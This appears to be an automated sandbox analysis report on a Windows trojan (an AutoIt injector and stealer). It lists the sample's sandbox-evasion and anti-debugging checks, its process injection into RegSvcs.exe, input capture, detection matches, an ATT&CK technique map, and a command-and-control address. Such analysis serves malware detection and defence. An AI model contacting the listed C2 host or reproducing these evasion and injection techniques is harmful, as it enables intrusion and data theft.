              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96522
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeAPI/Special instruction interceptor: Address: D3C3E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeAPI coverage: 3.9 %
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0103DBBE
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0100C2A2 FindFirstFileExW,0_2_0100C2A2
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0104698F
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_010468EE FindFirstFileW,FindClose,0_2_010468EE
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0103D076
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0103D3A9
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0104979D
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01049642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_01049642
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01049B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_01049B2B
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01045C97 FindFirstFileW,FindNextFileW,FindClose,0_2_01045C97
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FD42DE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: RegSvcs.exe, 00000002.00000002.2161582859.0000000000839000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104EAA2 BlockInput,0_2_0104EAA2
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01002622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01002622
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FD42DE
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF4CE8 mov eax, dword ptr fs:[00000030h]0_2_00FF4CE8
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00D3C6B0 mov eax, dword ptr fs:[00000030h]0_2_00D3C6B0
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00D3C650 mov eax, dword ptr fs:[00000030h]0_2_00D3C650
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00D3AFC0 mov eax, dword ptr fs:[00000030h]0_2_00D3AFC0
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01030B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_01030B62
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01002622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01002622
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FF083F
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF09D5 SetUnhandledExceptionFilter,0_2_00FF09D5
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FF0C21
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 557008Jump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01031201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_01031201
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01012BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_01012BA5
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103B226 SendInput,keybd_event,0_2_0103B226
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103E355 mouse_event,0_2_0103E355
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\aYf5ibGObB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01030B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_01030B62
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01031663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_01031663
              Source: aYf5ibGObB.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: aYf5ibGObB.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF0698 cpuid 0_2_00FF0698
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01048195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_01048195
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0102D27A GetUserNameW,0_2_0102D27A
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0100B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0100B952
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FD42DE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0.2.aYf5ibGObB.exe.19f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.aYf5ibGObB.exe.19f0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aYf5ibGObB.exe PID: 2104, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3596, type: MEMORYSTR
              Source: aYf5ibGObB.exeBinary or memory string: WIN_81
              Source: aYf5ibGObB.exeBinary or memory string: WIN_XP
              Source: aYf5ibGObB.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: aYf5ibGObB.exeBinary or memory string: WIN_XPe
              Source: aYf5ibGObB.exeBinary or memory string: WIN_VISTA
              Source: aYf5ibGObB.exeBinary or memory string: WIN_7
              Source: aYf5ibGObB.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 0.2.aYf5ibGObB.exe.19f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.aYf5ibGObB.exe.19f0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aYf5ibGObB.exe PID: 2104, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3596, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0.2.aYf5ibGObB.exe.19f0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.aYf5ibGObB.exe.19f0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aYf5ibGObB.exe PID: 2104, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3596, type: MEMORYSTR
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01051204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_01051204
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01051806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_01051806
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts
              1
              Native API
              1
              DLL Side-Loading
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              21
              Input Capture
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol21
              Input Capture
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Valid Accounts
              2
              Obfuscated Files or Information
              Security Account Manager1
              File and Directory Discovery
              SMB/Windows Admin Shares3
              Clipboard Data
              11
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation
              1
              DLL Side-Loading
              NTDS126
              System Information Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection
              1
              Masquerading
              LSA Secrets221
              Security Software Discovery
              SSHKeylogging12
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Valid Accounts
              Cached Domain Credentials111
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
              Virtualization/Sandbox Evasion
              DCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              aYf5ibGObB.exe78%ReversingLabsWin32.Trojan.AutoitInject
              aYf5ibGObB.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.222.58.90:556150%Avira URL Cloudsafe
              185.222.58.90:556150%Avira URL Cloudsafe
              http://185.222.58.90:55615/0%Avira URL Cloudsafe
              https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0035.t-0009.t-msedge.net
              13.107.246.63
              truefalse
                high
                api.ip.sb
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  185.222.58.90:55615true
                  • Avira URL Cloud: safe
                  unknown
                  http://185.222.58.90:55615/true
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ipinfo.io/ip%appdata%aYf5ibGObB.exe, 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmpfalse
                    high
                    http://api.ip.sbRegSvcs.exe, 00000002.00000002.2162985561.0000000002743000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://tempuri.org/Endpoint/CheckConnectLRRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://tempuri.org/Endpoint/CheckConnectResponseRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://tempuri.org/Endpoint/EnvironmentSettingsRegSvcs.exe, 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%aYf5ibGObB.exe, 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmpfalse
                                  high
                                  https://api.ip.sbRegSvcs.exe, 00000002.00000002.2162985561.0000000002712000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.ip.sb/geoipRegSvcs.exe, 00000002.00000002.2162985561.0000000002712000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/soap/envelope/RegSvcs.exe, 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/RegSvcs.exe, 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2162985561.0000000002712000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Endpoint/CheckConnectRegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Endpoint/EnvironmentSettingsLRRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://tempuri.org/Endpoint/VerifyUpdateResponseRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://tempuri.org/Endpoint/SetEnvironmentResponseRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/Endpoint/SetEnvironmentLRRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.ipify.orgcookies//settinString.RemovegaYf5ibGObB.exe, 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://tempuri.org/Endpoint/GetUpdatesLRRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Endpoint/VerifyUpdateLRRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://tempuri.org/Endpoint/GetUpdatesResponseRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://tempuri.org/Endpoint/RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://tempuri.org/Endpoint/EnvironmentSettingsResponseRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Endpoint/CheckConnectTRegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/0RegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://185.222.58.90:55615RegSvcs.exe, 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2162985561.00000000026EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.2162985561.00000000026EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
